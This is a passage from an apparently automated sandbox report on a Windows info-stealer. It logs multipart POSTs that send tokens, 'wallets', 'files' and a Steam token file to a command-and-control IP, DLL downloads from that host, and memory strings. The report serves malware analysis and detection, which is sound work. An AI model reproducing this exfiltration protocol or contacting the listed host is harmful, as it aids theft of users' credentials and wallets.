74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 2d 2d 0d 0a Data Ascii: ------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="message"wallets------DGCBKECAKFBGCAKECGIE--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 40.86.87.10Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBKHost: 40.86.87.10Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file"------CAFHDBGHJKFIDHJJJEBK--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 40.86.87.10Content-Length: 97855Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 40.86.87.10Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"jbdtaijovg------AEBGHDBKEBGIDHJJEHCA--

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EE4C90 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00EE4C90

Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache

Source: unknown

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php%
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php(
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php-LTC
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php2
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php9
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpI
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpirefox
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phposition:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php~
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll$
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllL
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/msvcp140.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllQ
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllllU
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllowser
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/sqlite3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/vcruntime140.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883712196.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GCGDGHCB.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: GCGDGHCB.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ep
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.epnacl
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
